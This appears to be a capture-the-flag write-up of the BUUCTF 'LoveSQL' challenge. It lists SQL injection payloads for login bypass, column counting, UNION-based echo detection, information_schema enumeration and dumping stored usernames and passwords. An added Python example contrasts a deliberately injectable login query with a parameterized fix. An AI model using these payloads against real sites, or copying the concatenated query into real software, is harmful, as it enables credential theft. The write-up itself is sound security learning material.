BUUCTF challenge notes
[极客大挑战 2019]LoveSQL
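Log in with the "universal password" (an always-true condition in the login form).
The password is not displayed directly.
Start the injection.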
1' or 1=1 order by 3#
1' or 1=1 order by 4#
This shows the query has 3 columns.
Next, determine which positions are echoed back.
-1' union select 1,2,3#
Enumerate the database: tables first, then columns.
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='geekuser'#
Both tables have the columns id,username,password
-1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1#
The output is a bit messy; view the page source to read it.
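
Why the column-count and echo-point steps above behave as they do, and what closes them, as an added example that is not part of the original notes: a login query built by string concatenation next to its parameterized form. The sqlite3 table contents, the function names and the "-- " comment marker (SQLite's, standing in for MySQL's #) are assumptions; the challenge's server code is not shown on the page.

```python
import sqlite3

def make_db():
    # Constructed sample data; the column layout (id, username, password)
    # follows the notes, the row itself is made up.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE geekuser (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO geekuser VALUES (1, 'admin', 'constructed-secret')")
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so a quote in it ends the string
    # literal and the rest of the input is parsed as SQL.
    sql = ("SELECT id, username, password FROM geekuser "
           "WHERE username = '" + username + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()

def login_safe(db, username, password):
    # Placeholders keep the input as data; it is only ever compared as a string.
    sql = ("SELECT id, username, password FROM geekuser "
           "WHERE username = ? AND password = ?")
    return db.execute(sql, (username, password)).fetchone()

def outcome(login, username):
    # Classify what the page would show: a row, a SQL error, or no match.
    db = make_db()
    try:
        row = login(db, username, "x")
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("row", row) if row else ("none", None)

if __name__ == "__main__":
    probes = ["1' or 1=1 order by 3-- ",    # 3 columns exist: row comes back
              "1' or 1=1 order by 4-- ",    # no 4th column: SQL error
              "-1' union select 1,2,3-- "]  # no real match: the 1,2,3 row is echoed
    for p in probes:
        print(repr(p), outcome(login_vulnerable, p)[0], outcome(login_safe, p)[0])
```

With the parameterized query every probe is just a username that matches no row, so neither the error difference nor the echoed row appears.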